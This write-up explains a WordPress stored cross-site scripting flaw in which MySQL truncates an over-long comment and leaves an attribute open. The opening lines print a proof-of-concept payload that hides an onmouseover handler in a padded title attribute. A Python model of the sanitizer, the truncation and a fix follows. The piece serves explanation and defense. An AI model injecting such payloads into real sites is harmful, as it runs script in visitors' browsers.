More details on the WordPress XSS vulnerability found by Klikki. Both real exploits include a
style attribute to widen the mouseover area to the whole viewport; I've left it out here to keep it simple.
The exploit comment is valid HTML and won't be altered by an HTML sanitizer:
<a title='x onmouseover=alert(unescape(/hello%20world/.source)) AAAAAAAAAAAA...[64 kb]..AAA'></a>
But once truncated by MySQL, the comment will become malformed HTML (note the attribute is left open):
<a title='x onmouseover=alert(unescape(/hello%20world/.source)) AAAAAAAAAAA
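To make the sanitizer/truncation ordering concrete, here is an added example (mine, not code from the post or from WordPress). It models a toy allow-list sanitizer that parses the comment as HTML, a MySQL TEXT column that silently cuts stored values at 65535 bytes (non-strict mode), and a small scanner that reports whether the stored fragment ends inside a tag with a quote still open. The attribute-like text inside the title uses the placeholder HANDLER instead of a real handler, the allowed-attribute set and the padding length are assumptions, and store_fixed shows the storage-side check (reject over-length input before sanitizing, never let the database cut it) rather than any particular project's patch.

```python
from html.parser import HTMLParser

# A MySQL TEXT column holds at most 65535 bytes; in non-strict SQL mode a longer
# value is silently truncated at that point instead of being rejected.
MYSQL_TEXT_LIMIT = 65535

# Toy allow-list policy for <a> (an assumption for this example).
ALLOWED_A_ATTRS = {"href", "title"}


class _AttrCollector(HTMLParser):
    """Collects (tag, attribute-name) pairs from well-formed markup."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            self.found.append((tag, name))


def sanitizer_accepts(fragment):
    """Accept only if every attribute on <a> is on the allow list.

    The sanitizer parses real HTML, so text inside a quoted attribute value is
    just data to it: 'onmouseover=' inside title='...' is never an attribute.
    """
    p = _AttrCollector()
    p.feed(fragment)
    p.close()
    return all(name in ALLOWED_A_ATTRS for tag, name in p.found if tag == "a")


def mysql_truncate(value, limit=MYSQL_TEXT_LIMIT):
    """Simulate non-strict MySQL: cut the stored bytes at the column width."""
    return value.encode("utf-8")[:limit].decode("utf-8", "ignore")


def has_unterminated_attribute(fragment):
    """True if the fragment ends inside a tag with an attribute quote still open.

    That is the malformed state the post describes: the opening quote was
    stored, the closing quote lay beyond the column limit.
    """
    in_tag = False
    quote = None
    for ch in fragment:
        if quote:                      # inside a quoted attribute value
            if ch == quote:
                quote = None
        elif in_tag:
            if ch in ("'", '"'):
                quote = ch
            elif ch == ">":
                in_tag = False
        elif ch == "<":
            in_tag = True
    return in_tag and quote is not None


def build_comment(padding):
    """Constructed sample with the shape of the post's comment: one quoted title
    attribute holding attribute-like text (HANDLER is a placeholder) and padding."""
    return "<a title='x onmouseover=HANDLER " + "A" * padding + "'></a>"


def store_vulnerable(comment):
    """Sanitize first, then let the database truncate: what is stored is not
    what was checked."""
    if not sanitizer_accepts(comment):
        raise ValueError("rejected by sanitizer")
    return mysql_truncate(comment)


def store_fixed(comment):
    """Enforce the column limit before anything else and reject over-length
    input outright, so nothing reaches storage that the sanitizer did not see
    in full."""
    if len(comment.encode("utf-8")) > MYSQL_TEXT_LIMIT:
        raise ValueError("comment too long for storage")
    if not sanitizer_accepts(comment):
        raise ValueError("rejected by sanitizer")
    return comment


if __name__ == "__main__":
    long_comment = build_comment(MYSQL_TEXT_LIMIT)
    print("sanitizer accepts full comment:", sanitizer_accepts(long_comment))
    stored = store_vulnerable(long_comment)
    print("stored bytes:", len(stored.encode("utf-8")))
    print("attribute left open after truncation:", has_unterminated_attribute(stored))
    try:
        store_fixed(long_comment)
    except ValueError as exc:
        print("fixed path:", exc)
```

The scanner is deliberately tiny (no handling of HTML comments or script bodies); its job is only to show that a well-formed input and its truncated stored form have different attribute structure, which is why a sanitizer that runs before the database write cannot vouch for what ends up on the page.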